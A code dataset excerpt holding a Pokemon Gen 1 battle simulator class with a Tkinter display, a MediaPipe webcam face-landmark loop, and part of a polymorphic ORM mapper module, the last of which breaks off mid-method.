[lossDefender,firstToSwitch] = self.statusCheck(defender,pokeDefender,pokeAttacker)\r\n if lossDefender:\r\n return \"loss:\"+first \r\n\r\n # one niche possibility is that the first pokemon used Haze while the second was asleep/frozen. In this case, the second pokemon should be unable to attack. in this case, result is \"unable\", and we skip to status check\r\n if result == \"unable\":\r\n if first == \"player\":\r\n # enemy is attacking now\r\n attacker=self.enemy\r\n moveAddress = optionEnemy[1]\r\n defender=self.player\r\n else:\r\n # player is attacking\r\n attacker=self.player\r\n moveAddress = optionPlayer[1]\r\n defender=self.enemy\r\n\r\n [lossAttacker,secondToSwitch] = self.statusCheck(attacker,pokeAttacker,pokeDefender)\r\n if lossAttacker:\r\n return \"loss:\"+second\r\n if not firstStatusChecked:\r\n [lossDefender,firstToSwitch] = self.statusCheck(defender,pokeDefender,pokeAttacker)\r\n if lossDefender:\r\n return \"loss:\"+first \r\n\r\n\r\n if firstToSwitch:\r\n if first == \"player\":\r\n print(self.player.name+\" needs to swap in a Pokemon.\")\r\n self.swapIn(self.player,self.enemy)\r\n else:\r\n print(self.enemy.name+\" needs to swap in a Pokemon.\")\r\n self.swapIn(self.enemy,self.player)\r\n if secondToSwitch:\r\n if second == \"player\":\r\n print(self.player.name+\" needs to swap in a Pokemon.\")\r\n self.swapIn(self.player,self.enemy)\r\n else:\r\n print(self.enemy.name+\" needs to swap in a Pokemon.\")\r\n self.swapIn(self.enemy,self.player)\r\n return \"\"\r\n\r\n def checkResult(self,result,attacker,defender):\r\n firstToSwitch = False\r\n secondToSwitch = False\r\n lossDefender = False\r\n lossAttacker = False\r\n if result == \"defender:faint\":\r\n defender.team[0].status = \"faint\"\r\n options = []\r\n for i in range(len(defender.team)):\r\n if defender.team[i].status != \"faint\":\r\n options.append(i)\r\n if options == []:\r\n print(defender.name + \" has no Pokemon left to battle.\")\r\n print(defender.name + \" has lost the battle!\")\r\n lossDefender = True\r\n else:\r\n secondToSwitch = True\r\n if result == \"attacker:faint\":\r\n attacker.team[0].status = \"faint\"\r\n options = []\r\n for i in range(len(attacker.team)):\r\n if attacker.team[i].status != \"faint\":\r\n options.append(i)\r\n if options == []:\r\n print(attacker.name + \" has no Pokemon left to battle.\")\r\n print(attacker.name + \" has lost the battle!\")\r\n lossAttacker = True\r\n else:\r\n firstToSwitch = True\r\n if result == \"both:faint\":\r\n defender.team[0].status = \"faint\"\r\n attacker.team[0].status = \"faint\"\r\n options = []\r\n for i in range(len(defender.team)):\r\n if defender.team[i].status != \"faint\":\r\n options.append(i)\r\n if options == []:\r\n print(defender.name + \" has no Pokemon left to battle.\")\r\n lossDefender = True\r\n else:\r\n secondToSwitch = True\r\n options = []\r\n for i in range(len(attacker.team)):\r\n if attacker.team[i].status != \"faint\":\r\n options.append(i)\r\n if options == []:\r\n print(attacker.name + \" has no Pokemon left to battle.\")\r\n lossAttacker = True\r\n else:\r\n firstToSwitch = True\r\n #if lossAttacker:\r\n #if lossDefender:\r\n # a draw\r\n # print(\"Both players have lost the battle!\")\r\n #else:\r\n #print(attacker.name+\" has lost the battle!\")\r\n\r\n #elif lossDefender:\r\n #print(defender.name+\" has lost the battle!\")\r\n return [firstToSwitch,secondToSwitch,lossAttacker,lossDefender]\r\n\r\n def swapIn(self,character,opposite):\r\n options = []\r\n for i in range(len(character.team)):\r\n if character.team[i].status != \"faint\":\r\n options.append(i)\r\n for i in range(len(options)):\r\n print(\"[\"+str(options[i])+\"] \" + character.team[options[i]].poke[\"name\"]+\" [\"+character.team[options[i]].status+\"] Level \"+str(character.team[options[i]].level))\r\n print(\"Which pokemon do you want to switch to?\")\r\n badAnswer = True\r\n while badAnswer:\r\n option = input()\r\n if option.isdigit():\r\n option = int(option)\r\n if option in options:\r\n badAnswer = False\r\n else:\r\n print(\"That isn't a valid answer!\")\r\n else:\r\n print(\"That isn't a valid answer!\")\r\n \r\n print(character.name+\" is sending in \"+character.team[option].poke[\"name\"])\r\n character.team[0].statReset()\r\n character.team[0].subbing = False\r\n character.team[0].mirrored=\"\"\r\n opposite.team[0].mirrored=\"\"\r\n character.team[0].bideDamage = 0\r\n character.team[0].turncount[\"bide\"] = -1\r\n if character.team[0].transformed:\r\n character.team[0].unTransform()\r\n\r\n character.team[0], character.team[option] = character.team[option], character.team[0]\r\n character.team[0].statUpdate(\"send\",character.badges)\r\n character.team[0].setStats()\r\n return \"\"\r\n\r\n def pickOptions(self,character):\r\n validChoice = False\r\n if (character.team[0].charging == -1) and (not character.team[0].recharging) and (character.team[0].raging== -1):\r\n while not validChoice:\r\n print(character.name+\"'s Options\")\r\n print(\"[1] ATTACK [2] ITEM [3] SWAP\")\r\n macroOption = input()\r\n if macroOption not in ['1','2','3']:\r\n print(\"That is not a valid choice!\")\r\n\r\n elif (character.team[0].turncount[\"thrash\"] != -1) and macroOption == '3':\r\n print(\"A thrashing Pokemon cannot swap out!\")\r\n\r\n elif macroOption == '1':\r\n # if the pokemon is using bide or a thrashlike move, we continue using bide\r\n attacks = character.team[0].moveset\r\n\r\n if character.team[0].turncount[\"bide\"] != -1:\r\n return [\"attack\",character.team[0].bideUsed]\r\n if character.team[0].turncount[\"thrash\"] != -1:\r\n return [\"attack\",character.team[0].thrashUsed]\r\n if character.team[0].turncount[\"binding\"] != -1:\r\n return [\"attack\",character.team[0].bindUsed]\r\n\r\n # if the pokemon has no moves left to use, either because of disable or PP, it's STRUGGLE time\r\n struggleTime = True\r\n for a in range(len(attacks)):\r\n if (attacks[a][\"name\"] != character.team[0].disable) and (character.team[0].PP[a] != 0):\r\n # if at least one move is not disabled and is not out of PP, no need to struggle\r\n struggleTime = False\r\n if struggleTime:\r\n print(\"The pokemon must struggle!\")\r\n for i in range(len(self.moveInfo[\"moves\"])):\r\n if self.moveInfo[\"moves\"][i][\"name\"] == \"Struggle\":\r\n struggle = self.moveInfo[\"moves\"][i] \r\n if character.team[0].moveset[len(character.team[0].moveset)-1]!=struggle:\r\n character.team[0].moveset.append(struggle)\r\n character.team[0].PP.append(0)\r\n return [\"attack\",len(character.team[0].moveset)-1]\r\n \r\n for i in range(len(attacks)):\r\n print(\"[\"+str(i+1)+\"] \"+attacks[i][\"name\"])\r\n option = input() \r\n if option != '0':\r\n if (not option.isdigit()): \r\n print(\"That is not a valid choice!\")\r\n elif (int(option)>(len(attacks))) or (int(option)<1):\r\n print(\"That is not a valid choice!\")\r\n elif attacks[int(option)-1][\"name\"] == character.team[0].disable:\r\n print(\"That move is disabled!\")\r\n elif character.team[0].PP[int(option)-1] == 0:\r\n print(\"That move has no PP!\")\r\n else:\r\n return [\"attack\",int(option)-1]\r\n elif macroOption == '2':\r\n items = character.items\r\n if len(items) == 0:\r\n print(\"You have no items!\")\r\n else:\r\n for i in range(len(items)):\r\n print(\"[\"+str(i+1)+\"] \"+items[i])\r\n print(\"Which item do you want to use? (0 to choose another option)\")\r\n option = input()\r\n if (not option.isdigit()):\r\n print(\"That is not a valid choice!\")\r\n elif (int(option)>(len(items))) or (int(option)<1):\r\n print(\"That is not a valid choice!\")\r\n elif option != '0':\r\n return [\"item\",int(option)-1]\r\n elif macroOption == '3':\r\n options = []\r\n for i in range(len(character.team)):\r\n if character.team[i].status != \"faint\":\r\n options.append(i)\r\n if options == []:\r\n print(\"You don't have Pokemon to switch to!\")\r\n print(\"\")\r\n else:\r\n for i in range(len(options)):\r\n print(\"[\"+str(options[i])+\"] \" + character.team[options[i]].poke[\"name\"]+\" [\"+character.team[options[i]].status+\"] Level \"+str(character.team[options[i]].level))\r\n print(\"Which pokemon do you want to switch to? (0 to choose another option)\")\r\n option = input()\r\n if (not option.isdigit()):\r\n print(\"That is not a valid choice!\")\r\n elif int(option) not in options:\r\n print(\"That is not a valid choice!\")\r\n elif int(option) != 0:\r\n return [\"swap\",int(option)]\r\n elif character.team[0].charging != -1:\r\n return [\"attack\",character.team[0].charging]\r\n elif character.team[0].recharging:\r\n return [\"recharge\"]\r\n elif character.team[0].raging != -1:\r\n return [\"attack\",character.team[0].raging]\r\n return\r\n\r\n def turn(self,optionPlayer,optionEnemy):\r\n moveInfo = self.moveInfo\r\n isOver = \"\"\r\n # option is a list of form [move/swap/item,address]\r\n optionTypePlayer = optionPlayer[0]\r\n optionTypeEnemy = optionEnemy[0]\r\n\r\n # swap happpens first always\r\n if optionTypePlayer == \"swap\":\r\n print(self.player.name+\" is swapping out \"+self.player.team[0].poke[\"name\"]+\" and is sending in \"+self.player.team[optionPlayer[1]].poke[\"name\"])\r\n self.player.team[0].statReset()\r\n self.player.team[0].subbing = False\r\n if self.player.team[0].mimic_on != -1:\r\n for i in len(moveInfo[\"moves\"]):\r\n if moveInfo[\"moves\"][i][\"name\"] == \"Mimic\":\r\n mimic = moveInfo[\"moves\"][i]\r\n self.player.team[0].moveset[self.player.team[0].mimic_on] = mimic\r\n self.player.team[0].mimic_on = -1\r\n\r\n if self.player.team[0].transformed:\r\n self.player.team[0].unTransform()\r\n\r\n self.player.team[0], self.player.team[optionPlayer[1]] = self.player.team[optionPlayer[1]], self.player.team[0]\r\n self.player.team[0].statUpdate(\"send\",self.player.badges)\r\n self.player.team[0].setStats()\r\n self.guiUpdate()\r\n if optionTypeEnemy == \"swap\":\r\n print(self.enemy.name+\" is swapping out \"+self.enemy.team[0].poke[\"name\"]+\" and is sending in \"+self.enemy.team[optionEnemy[1]].poke[\"name\"])\r\n self.enemy.team[0].statReset()\r\n self.enemy.team[0].subbing = False\r\n if self.enemy.team[0].mimic_on != -1:\r\n for i in len(moveInfo[\"moves\"]):\r\n if moveInfo[\"moves\"][i][\"name\"] == \"Mimic\":\r\n mimic = moveInfo[\"moves\"][i]\r\n self.enemy.team[0].moveset[self.player.team[0].mimic_on] = mimic\r\n self.enemy.team[0].mimic_on = -1\r\n\r\n if self.enemy.team[0].transformed:\r\n self.enemy.team[0].unTransform()\r\n\r\n self.enemy.team[0], self.enemy.team[optionEnemy[1]] = self.enemy.team[optionEnemy[1]], self.enemy.team[0]\r\n self.enemy.team[0].statUpdate(\"send\",self.enemy.badges)\r\n self.enemy.team[0].setStats()\r\n self.guiUpdate()\r\n # item happens next\r\n if optionTypePlayer == \"item\":\r\n parseItem(self.player,self.enemy,optionPlayer[1])\r\n self.guiUpdate()\r\n if optionTypeEnemy == \"item\":\r\n parseItem(self.enemy,self.player,optionEnemy[1])\r\n self.guiUpdate()\r\n # attacks happen next\r\n if optionTypeEnemy == \"attack\" or optionTypePlayer == \"attack\":\r\n isOver = self.attackPhase(optionPlayer,optionEnemy)\r\n if (optionTypeEnemy == \"recharge\") and (self.enemy.team[0].recharging>0) and (self.enemy.team[0].HP !=0):\r\n self.enemy.team[0].recharging = self.enemy.team[0].recharging - 1\r\n if self.enemy.team[0].recharging == 0:\r\n print(self.enemy.team[0].poke[\"name\"]+\" is recharging from its Hyper Beam!\")\r\n if (optionTypePlayer == \"recharge\") and (self.player.team[0].recharging>0) and (self.player.team[0].HP !=0):\r\n self.player.team[0].recharging = self.player.team[0].recharging - 1\r\n if self.player.team[0].recharging == 0:\r\n print(self.player.team[0].poke[\"name\"]+\" is recharging from its Hyper Beam!\")\r\n self.guiUpdate()\r\n # recharging will occur after the turn if necessary\r\n else:\r\n #in this case, we have to check status conditions separately\r\n if (optionTypeEnemy == \"recharge\") and (self.enemy.team[0].recharging>0) and (self.enemy.team[0].HP !=0):\r\n self.enemy.team[0].recharging = self.enemy.team[0].recharging - 1\r\n if self.enemy.team[0].recharging == 0:\r\n print(self.enemy.team[0].poke[\"name\"]+\" is recharging from its Hyper Beam!\")\r\n if (optionTypePlayer == \"recharge\") and (self.player.team[0].recharging>0) and (self.player.team[0].HP !=0):\r\n self.player.team[0].recharging = self.player.team[0].recharging - 1\r\n if self.player.team[0].recharging == 0:\r\n print(self.player.team[0].poke[\"name\"]+\" is recharging from its Hyper Beam!\")\r\n self.guiUpdate()\r\n\r\n [lossPlayer,playerToSwitch] = self.statusCheck(self.player,self.player.team[0],self.enemy.team[0])\r\n [lossEnemy,enemyToSwitch] = self.statusCheck(self.enemy,self.enemy.team[0],self.player.team[0])\r\n self.guiUpdate()\r\n if lossPlayer:\r\n if lossEnemy:\r\n print(\"Both players have lost the battle!\")\r\n return \"loss:both\"\r\n else:\r\n print(self.player.name+\" has lost the battle!\")\r\n return \"loss:player\"\r\n elif lossEnemy:\r\n print(self.enemy.name+ \" has lost the battle!\")\r\n return \"loss:enemy\"\r\n \r\n if playerToSwitch:\r\n print(self.player.name+\" needs to swap in a Pokemon.\")\r\n self.swapIn(self.player,self.enemy)\r\n if enemyToSwitch:\r\n print(self.enemy.name+\" needs to swap in a Pokemon.\")\r\n self.swapIn(self.enemy,self.player)\r\n return isOver\r\n\r\n def guiUpdate(self): \r\n enemypoke = self.enemy.team[0]\r\n playerpoke = self.player.team[0]\r\n\r\n textE = \"NAME: \"+enemypoke.poke[\"name\"]+\"\\t\\tSTATUS: \"+str(enemypoke.status).casefold()+\"\\tHP: \"+str(enemypoke.HP)+\"/\"+str(enemypoke.maxHP)+\"\\tPP: \"+str(enemypoke.PP) + \"\\tATT: \"+str(enemypoke.attack)+\"\\t\\tDEF: \"+str(enemypoke.defense)+\"\\t\\tSPEC: \"+str(enemypoke.special)+\"\\tSPD: \"+str(enemypoke.speed)\r\n textE = textE + \"\\nMOD: \"+str(enemypoke.modifiers)+\"\\tCONF: \"+str(enemypoke.confused)+\"\\tTURNCT: \"+str(enemypoke.turncount)\r\n textE = textE + \"\\nLOC: \"+str(enemypoke.whereIs)+\"\\tLASTDAM: \"+str(enemypoke.lastDamage)+\"\\tMIR: \"+str(enemypoke.mirrorable)+\"\\tDIS: \"+str(enemypoke.disable) + \"\\tTRANSF: \"+str(enemypoke.transformed) + \"\\tRAGE: \"+str(enemypoke.raging)\r\n textE = textE + \"\\tRAGEACC: \"+str(enemypoke.rageAcc)+\"\\tSEED: \"+str(enemypoke.leechSeed)+\"\\tCHARGE: \"+str(enemypoke.charging)+\"\\nRECHARGE: \"+str(enemypoke.recharging) + \"\\tMIMIC: \"+str(enemypoke.mimic_on) + \"\\tWALL: \"+str(enemypoke.wall)\r\n textE = textE + \"\\tTHRASHUSED: \"+str(enemypoke.thrashUsed)+\"\\tBIDEUSED: \"+str(enemypoke.bideUsed) + \"\\tBINDUSED: \"+str(enemypoke.bindUsed)+\"\\tBIDEDAM: \"+str(enemypoke.bideDamage) + \"\\tBINDDAM: \"+str(enemypoke.bindDamage)\r\n textE = textE + \"\\nTYPES: \"+str(enemypoke.types) + \"\\tXACC: \"+str(enemypoke.xAcc)+ \"\\tSUB: \" + str(enemypoke.subbing) + \"\\tSUBHP: \" + str(enemypoke.subHP) + \"\\tMAXPP: \"+str(enemypoke.maxPP) + \"\\t\\tMOVES: [\"\r\n for i in range(len(enemypoke.moveset)):\r\n textE = textE + enemypoke.moveset[i][\"name\"]\r\n if i != (len(enemypoke.moveset)-1):\r\n textE = textE + \", \"\r\n textE = textE + \"]\"\r\n self.label_stats_e.configure(text=textE,background=\"white\", font=('Helvetica 8'), justify= LEFT)\r\n\r\n img_frontsprite = PhotoImage(file=\"gen1data/sprites/front-\"+str(enemypoke.poke[\"number\"])+\".png\")\r\n self.label_frontsprite.configure(image=img_frontsprite)\r\n self.label_frontsprite.image=img_frontsprite\r\n\r\n img_backsprite = PhotoImage(file=\"gen1data/sprites/back-\"+str(playerpoke.poke[\"number\"])+\".png\")\r\n self.label_backsprite.configure(image=img_backsprite)\r\n self.label_backsprite.image = img_backsprite\r\n\r\n textP = \"NAME: \"+playerpoke.poke[\"name\"]+\"\\t\\tSTATUS: \"+str(playerpoke.status).casefold()+\"\\tHP: \"+str(playerpoke.HP)+\"/\"+str(playerpoke.maxHP)+\"\\tPP: \"+str(playerpoke.PP) + \"\\tATT: \"+str(playerpoke.attack)+\"\\t\\tDEF: \"+str(playerpoke.defense)+\"\\t\\tSPEC: \"+str(playerpoke.special)+\"\\tSPD: \"+str(playerpoke.speed)\r\n textP = textP + \"\\nMOD: \"+str(playerpoke.modifiers)+\"\\tCONF: \"+str(playerpoke.confused)+\"\\tTURNCT: \"+str(playerpoke.turncount)\r\n textP = textP + \"\\nLOC: \"+str(playerpoke.whereIs)+\"\\tLASTDAM: \"+str(playerpoke.lastDamage)+\"\\tMIR: \"+str(playerpoke.mirrorable)+\"\\tDIS: \"+str(playerpoke.disable) + \"\\tTRANSF: \"+str(playerpoke.transformed) + \"\\tRAGE: \"+str(playerpoke.raging)\r\n textP = textP + \"\\tRAGEACC: \"+str(playerpoke.rageAcc)+\"\\tSEED: \"+str(playerpoke.leechSeed)+\"\\tCHARGE: \"+str(playerpoke.charging)+\"\\nRECHARGE: \"+str(playerpoke.recharging) + \"\\tMIMIC: \"+str(playerpoke.mimic_on) + \"\\tWALL: \"+str(playerpoke.wall)\r\n textP = textP + \"\\tTHRASHUSED: \"+str(playerpoke.thrashUsed)+\"\\tBIDEUSED: \"+str(playerpoke.bideUsed) + \"\\tBINDUSED: \"+str(playerpoke.bindUsed)+\"\\tBIDEDAM: \"+str(playerpoke.bideDamage) + \"\\tBINDDAM: \"+str(playerpoke.bindDamage)\r\n textP = textP + \"\\nTYPES: \"+str(playerpoke.types) + \"\\tXACC: \"+str(playerpoke.xAcc)+ \"\\tSUB: \" + str(playerpoke.subbing) + \"\\tSUBHP: \" + str(playerpoke.subHP) + \"\\tMAXPP: \"+str(playerpoke.maxPP) + \"\\t\\tMOVES: [\"\r\n for i in range(len(playerpoke.moveset)):\r\n textP = textP + playerpoke.moveset[i][\"name\"]\r\n if i != (len(playerpoke.moveset)-1):\r\n textP = textP + \", \"\r\n textP = textP + \"]\"\r\n\r\n self.label_stats_p.configure(text=textP,background=\"white\", font=('Helvetica 8'), justify= LEFT)\r\n\r\n def guiInit(self):\r\n root = Tk()\r\n root.title('Battle')\r\n root.geometry('1900x300')\r\n root.configure(background = \"white\")\r\n root.resizable(False, False)\r\n options = {'padx': 5, 'pady': 5}\r\n\r\n # grab enemy pokemon details\r\n enemypoke = self.enemy.team[0]\r\n playerpoke = self.player.team[0]\r\n\r\n textE = \"NAME: \"+enemypoke.poke[\"name\"]+\"\\tSTATUS: \"+str(enemypoke.status).casefold()+\"\\tHP: \"+str(enemypoke.HP)+\"/\"+str(enemypoke.maxHP)+\"\\tPP: \"+str(enemypoke.PP) + \"\\tATT: \"+str(enemypoke.attack)+\"\\t\\tDEF: \"+str(enemypoke.defense)+\"\\t\\tSPEC: \"+str(enemypoke.special)+\"\\tSPD: \"+str(enemypoke.speed)\r\n textE = textE + \"\\nMOD: \"+str(enemypoke.modifiers)+\"\\tCONF: \"+str(enemypoke.confused)+\"\\tTURNCT: \"+str(enemypoke.turncount)\r\n textE = textE + \"\\nLOC: \"+str(enemypoke.whereIs)+\"\\tLASTDAM: \"+str(enemypoke.lastDamage)+\"\\tMIR: \"+str(enemypoke.mirrorable)+\"\\tDIS: \"+str(enemypoke.disable) + \"\\tTRANSF: \"+str(enemypoke.transformed) + \"\\tRAGE: \"+str(enemypoke.raging)\r\n textE = textE + \"\\tRAGEACC: \"+str(enemypoke.rageAcc)+\"\\tSEED: \"+str(enemypoke.leechSeed)+\"\\tCHARGE: \"+str(enemypoke.charging)+\"\\nRECHARGE: \"+str(enemypoke.recharging) + \"\\tMIMIC: \"+str(enemypoke.mimic_on) + \"\\tWALL: \"+str(enemypoke.wall)\r\n textE = textE + \"\\tTHRASHUSED: \"+str(enemypoke.thrashUsed)+\"\\tBIDEUSED: \"+str(enemypoke.bideUsed) + \"\\tBINDUSED: \"+str(enemypoke.bindUsed)+\"\\tBIDEDAM: \"+str(enemypoke.bideDamage) + \"\\tBINDDAM: \"+str(enemypoke.bindDamage)\r\n textE = textE + \"\\nTYPES: \"+str(enemypoke.types) + \"\\tXACC: \"+str(enemypoke.xAcc)+ \"\\tSUB: \" + str(enemypoke.subbing) + \"\\tSUBHP: \" + str(enemypoke.subHP) + \"\\tMAXPP: \"+str(enemypoke.maxPP) + \"\\t\\tMOVES: [\"\r\n for i in range(len(enemypoke.moveset)):\r\n textE = textE + enemypoke.moveset[i][\"name\"]\r\n if i != (len(enemypoke.moveset)-1):\r\n textE = textE + \", \"\r\n textE = textE + \"]\"\r\n self.label_stats_e = Label(root,text=textE,background=\"white\", font=('Helvetica 8'), justify= LEFT)\r\n self.label_stats_e.grid(column=0,row=0,sticky='W',**options)\r\n\r\n img_frontsprite = PhotoImage(file=\"gen1data/sprites/front-\"+str(enemypoke.poke[\"number\"])+\".png\")\r\n self.label_frontsprite = Label(root,image=img_frontsprite,background=\"white\")\r\n self.label_frontsprite.grid(column=1,row=0,**options)\r\n\r\n textP = \"NAME: \"+playerpoke.poke[\"name\"]+\"\\t\\tSTATUS: \"+str(playerpoke.status).casefold()+\"\\tHP: \"+str(playerpoke.HP)+\"/\"+str(playerpoke.maxHP)+\"\\tPP: \"+str(playerpoke.PP) + \"\\tATT: \"+str(playerpoke.attack)+\"\\t\\tDEF: \"+str(playerpoke.defense)+\"\\t\\tSPEC: \"+str(playerpoke.special)+\"\\tSPD: \"+str(playerpoke.speed)\r\n textP = textP + \"\\nMOD: \"+str(playerpoke.modifiers)+\"\\tCONF: \"+str(playerpoke.confused)+\"\\tTURNCT: \"+str(playerpoke.turncount)\r\n textP = textP + \"\\nLOC: \"+str(playerpoke.whereIs)+\"\\tLASTDAM: \"+str(playerpoke.lastDamage)+\"\\tMIR: \"+str(playerpoke.mirrorable)+\"\\tDIS: \"+str(playerpoke.disable) + \"\\tTRANSF: \"+str(playerpoke.transformed) + \"\\tRAGE: \"+str(playerpoke.raging)\r\n textP = textP + \"\\tRAGEACC: \"+str(playerpoke.rageAcc)+\"\\tSEED: \"+str(playerpoke.leechSeed)+\"\\tCHARGE: \"+str(playerpoke.charging)+\"\\nRECHARGE: \"+str(playerpoke.recharging) + \"\\tMIMIC: \"+str(playerpoke.mimic_on) + \"\\tWALL: \"+str(playerpoke.wall)\r\n textP = textP + \"\\tTHRASHUSED: \"+str(playerpoke.thrashUsed)+\"\\tBIDEUSED: \"+str(playerpoke.bideUsed) + \"\\tBINDUSED: \"+str(playerpoke.bindUsed)+\"\\tBIDEDAM: \"+str(playerpoke.bideDamage) + \"\\tBINDDAM: \"+str(playerpoke.bindDamage)\r\n textP = textP + \"\\nTYPES: \"+str(playerpoke.types) + \"\\tXACC: \"+str(playerpoke.xAcc)+\"\\tSUB: \" + str(playerpoke.subbing) + \"\\tSUBHP: \" + str(playerpoke.subHP) + \"\\tMAXPP: \"+str(playerpoke.maxPP) + \"\\t\\tMOVES: [\"\r\n for i in range(len(playerpoke.moveset)):\r\n textP = textP + playerpoke.moveset[i][\"name\"]\r\n if i != (len(playerpoke.moveset)-1):\r\n textP = textP + \", \"\r\n textP = textP + \"]\"\r\n self.label_stats_p = Label(root,text=textP,background=\"white\", font=('Helvetica 8'), justify= LEFT)\r\n self.label_stats_p.grid(column=0,row=1,sticky='W',**options)\r\n\r\n img_backsprite = PhotoImage(file=\"gen1data/sprites/back-\"+str(playerpoke.poke[\"number\"])+\".png\")\r\n self.label_backsprite = Label(root,image=img_backsprite,background=\"white\")\r\n self.label_backsprite.grid(column=1,row=1,**options)\r\n\r\n\r\n def __init__(self,player,enemy,typeInfo,moveInfo):\r\n self.typeInfo = typeInfo\r\n self.moveInfo = moveInfo\r\n self.player = player\r\n self.enemy = enemy\r\n\r\n ### GUI INITIALIZATION\r\n self.guiInit()\r\n ###\r\n\r\n\r\n print(self.player.name+\" sends out \"+self.player.team[0].poke[\"name\"]+\"!\")\r\n self.player.team[0].statUpdate(\"send\",self.player.badges)\r\n self.player.team[0].setStats()\r\n print(self.enemy.name+\" sends out \"+self.enemy.team[0].poke[\"name\"]+\"!\")\r\n self.enemy.team[0].statUpdate(\"send\",self.enemy.badges)\r\n self.enemy.team[0].setStats()\r\n\r\n isOver = \"\"\r\n while isOver == \"\":\r\n self.guiUpdate()\r\n print(\"\")\r\n optionPlayer = self.pickOptions(self.player)\r\n print(\"\")\r\n optionEnemy = self.pickOptions(self.enemy) \r\n isOver = self.turn(optionPlayer,optionEnemy)\r\n\r\n input() \r\n","repo_name":"Brian-Frost-LaPlante/pkEnv","sub_path":"BattleClass.py","file_name":"BattleClass.py","file_ext":"py","file_size_in_byte":46901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4028889091","text":"from typing import NamedTuple\n\nimport cv2\nimport mediapipe as mp\n\nimport types_for_project as tp\n\n\ndef process_landmarks_loop(cap,\n face_mesher: mp.solutions.face_mesh.FaceMesh,\n landmark_relay: tp.LandmarkRelay,\n video_processor: tp.VideoProcessor):\n while cap.isOpened():\n success, image = cap.read()\n\n if not success:\n continue\n\n image.flags.writeable = False\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n results: NamedTuple = face_mesher.process(image)\n\n if results.multi_face_landmarks:\n landmark_relay(results.multi_face_landmarks[0].landmark)\n\n if video_processor(image, results.multi_face_landmarks):\n break\n\n\ndef process_landmarks(landmark_processor: tp.LandmarkRelay, video_processor: tp.VideoProcessor):\n camera = cv2.VideoCapture(0)\n\n try:\n with mp.solutions.face_mesh.FaceMesh(\n max_num_faces=1,\n refine_landmarks=True,\n min_detection_confidence=0.5,\n min_tracking_confidence=0.5\n ) as face_mesh:\n process_landmarks_loop(camera, face_mesh, landmark_processor, video_processor)\n camera.release()\n\n except KeyboardInterrupt:\n camera.release();\n","repo_name":"JordanHendersonMusic/jellyfish","sub_path":"webcamtrack_mediapipe/landmark_processor.py","file_name":"landmark_processor.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73168309539","text":"# -*- coding: utf-8 -*-\nfrom collections import OrderedDict\nfrom ascetic import exceptions\nfrom ascetic.mappers import Load, Mapper, OneToOne, Result\nfrom ascetic.utils import to_tuple\nfrom ascetic.utils import cached_property\nfrom ascetic.contrib.gfk import GenericForeignKey\n\n# TODO: Support for native support inheritance:\n# http://www.postgresql.org/docs/9.4/static/tutorial-inheritance.html\n# http://www.postgresql.org/docs/9.4/static/ddl-inherit.html\n\n\nclass NativePolymorphicMapper(object):\n pass\n\n\nclass PolymorphicMapper(Mapper):\n\n result_factory = staticmethod(lambda *a, **kw: PolymorphicResult(*a, **kw))\n\n def get_polymorphic_bases(self, derived_model):\n bases = []\n for base in derived_model.__bases__:\n if getattr(self.get_mapper(base), 'polymorphic', False):\n bases.append(base)\n else:\n bases += self.get_polymorphic_bases(base)\n return tuple(bases)\n\n @cached_property\n def polymorphic_bases(self):\n return tuple(self.get_mapper(base_model) for base_model in self.get_polymorphic_bases(self.model))\n\n # TODO: Fix the diamond inheritance problem???\n # I'm not sure is it a problem... After first base save model will has PK...\n # @cached_property\n # def polymorphic_mro(self):\n # pass\n\n @cached_property\n def polymorphic_fields(self):\n fields = OrderedDict()\n for base in self.polymorphic_bases:\n fields.update(base.polymorphic_fields)\n for name, field in self.fields.items():\n fields[name] = field\n return fields\n\n @cached_property\n def polymorphic_columns(self):\n cols = OrderedDict()\n for base in self.polymorphic_bases:\n cols.update(base.polymorphic_columns)\n for name, col in self.fields.items():\n cols[name] = col\n return cols\n\n @property\n def query(self):\n bases = self.polymorphic_bases\n if bases:\n base = bases[-1]\n q = base.query\n derived_mappers = (self,) + bases[:-1]\n for derived_mapper in derived_mappers:\n t = derived_mapper.sql_table\n q = q.fields(\n *self.get_sql_fields()\n ).tables((\n q.tables() & t\n ).on(\n t.pk == base.sql_table.pk\n ))\n else:\n q = super(PolymorphicMapper, self).query\n q.result = PolymorphicResult(self, self._default_db())\n return q\n\n def _do_prepare_model(self, model):\n for base in model.mro():\n if base is not model and getattr(self.get_mapper(base), 'polymorphic', False):\n pk_related_name = \"{}_ptr\".format(base.__name__.lower())\n # self.pk = \"{}_id\".format(pk_related_name) # Useless, pk read from DB\n # TODO: support multiple inheritance\n setattr(model, pk_related_name, OneToOne(\n base,\n field=self.get_mapper(model).pk,\n related_field=self.get_mapper(base).pk,\n related_name=model.__name__.lower(),\n query=(lambda rel: rel.mapper.query.polymorphic(False)),\n related_query=(lambda rel: rel.related_mapper.query.polymorphic(False))\n ))\n break\n else:\n if getattr(self.get_mapper(model), 'polymorphic', False):\n setattr(model, \"concrete_instance\", GenericForeignKey(\n type_field=\"polymorphic_type_id\",\n related_field=(lambda rel: rel.related_mapper.pk),\n field=self.get_mapper(model).pk,\n ))\n super(PolymorphicMapper, self)._do_prepare_model(self.model)\n\n def load(self, data, db, from_db=True, reload=False):\n return PolymorphicLoad(self, data, db, from_db, reload).compute()\n\n def validate(self, obj, fields=frozenset(), exclude=frozenset()):\n errors = {}\n for base in self.polymorphic_bases:\n try:\n base.validate(obj, fields=fields, exclude=exclude)\n except exceptions.ValidationError as e:\n errors.update(e.args[0])\n\n try:\n super(PolymorphicMapper, self).validate(obj, fields=fields, exclude=exclude)\n except exceptions.ValidationError as e:\n errors.update(e.args[0])\n\n if errors:\n raise exceptions.ValidationError(errors)\n\n def save(self, obj):\n if not self.polymorphic_fields['polymorphic_type_id'].get_value(obj):\n obj.polymorphic_type_id = self.get_mapper(obj.__class__).name\n for base in self.polymorphic_bases:\n new_record = self.is_new(obj)\n base.save(obj)\n for key, base_key in zip(to_tuple(self.pk), to_tuple(base.pk)):\n self.fields[key].set_value(obj, self.polymorphic_fields[base_key].get_value(obj))\n self.is_new(obj, new_record)\n return super(PolymorphicMapper, self).save(obj)\n\n\nclass PolymorphicResult(Result):\n\n _polymorphic = True\n\n def polymorphic(self, val=True):\n self._polymorphic = val\n return self._query\n\n def fill_cache(self):\n if self._cache is not None or not self._polymorphic:\n return super(PolymorphicResult, self).fill_cache()\n\n 